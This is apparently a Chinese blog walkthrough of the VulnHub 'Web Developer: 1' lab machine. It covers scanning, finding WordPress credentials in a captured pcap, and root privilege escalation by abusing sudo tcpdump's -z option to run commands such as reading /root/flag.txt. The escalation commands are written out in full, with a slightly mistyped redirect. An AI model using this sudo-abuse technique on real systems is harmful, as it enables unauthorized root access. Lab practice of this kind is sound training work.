vulnhub-Web Developer 1靶机

vulnhub:Web Developer: 1 ~ VulnHub

导入靶机,放在kali同网段,扫描

靶机在192.168.114.129,扫描端口

有网站服务,访问

没什么东西,扫目录

真不少,访问一下,也只是一些普通的Wordpress的页面,换个字典再扫一次

这次多出来一个ipdata目录

里面有个cap文件,下载

在里面找到了账号密码

webdeveloper:Te5eQg&4sBS!Yr$)wf%(DcAd

登录wordpress

靶机似乎有点问题,我这里跳过获取Wordpress的shell,请自行参考别的wp

webdeveloper:MasterOfTheUniverse

登录

根据sudo -l,我们可以运行tcpdump

查看提权网站的使用方式

COMMAND='ls -al /root'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

执行完成后,再开一个终端,执行命令

nc -v -z -n -w 1 127.0.0.1 1

可以看到原来的终端执行了ls -al /root命令,所以我们只需要替换命令就可以查看flag

COMMAND='cat /root/flag.txt'

TF=$(mktemp)

echo "COMMAND" \> TF

chmod +x $TF

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF

相关推荐
会有钱的-_-5 小时前
基于webpack的场景解决
前端·vue.js·webpack·安全性测试
刀客1231 天前
测试之道:从新手到专家实战(四)
python·功能测试·程序人生·测试用例·集成测试·学习方法·安全性测试
介一安全9 天前
【Web安全】CRLF注入攻击深度解析:原理、场景与安全测试防御指南
安全·web安全·网络安全·代码审计·安全性测试
介一安全12 天前
AI 暗战: 回声室攻击 —— 解锁大模型安全防御的隐秘战场
人工智能·安全·ai·安全性测试
TwoAI14 天前
信息搜集工具篇、rustscan
安全性测试
卓码软件测评20 天前
软件测试:如何利用Burp Suite进行高效WEB安全测试
网络·安全·web安全·可用性测试·安全性测试
卓码软件测评22 天前
【网站测试:CORS配置错误引发的安全风险及测试】
功能测试·安全·web安全·压力测试·可用性测试·安全性测试
成成成成成成果1 个月前
电商支付异常测试全攻略
功能测试·测试工具·集成测试·模块测试·测试覆盖率·安全性测试·testlink
介一安全1 个月前
【BurpSuite 插件开发】实战篇(六)实现自定义请求头的修改与请求测试
web安全·安全性测试·burpsuite·安全工具·burp 开发
卓码软件测评1 个月前
软件测试测评公司关于HTTP安全头配置与测试?
web安全·网络安全·安全性测试·web app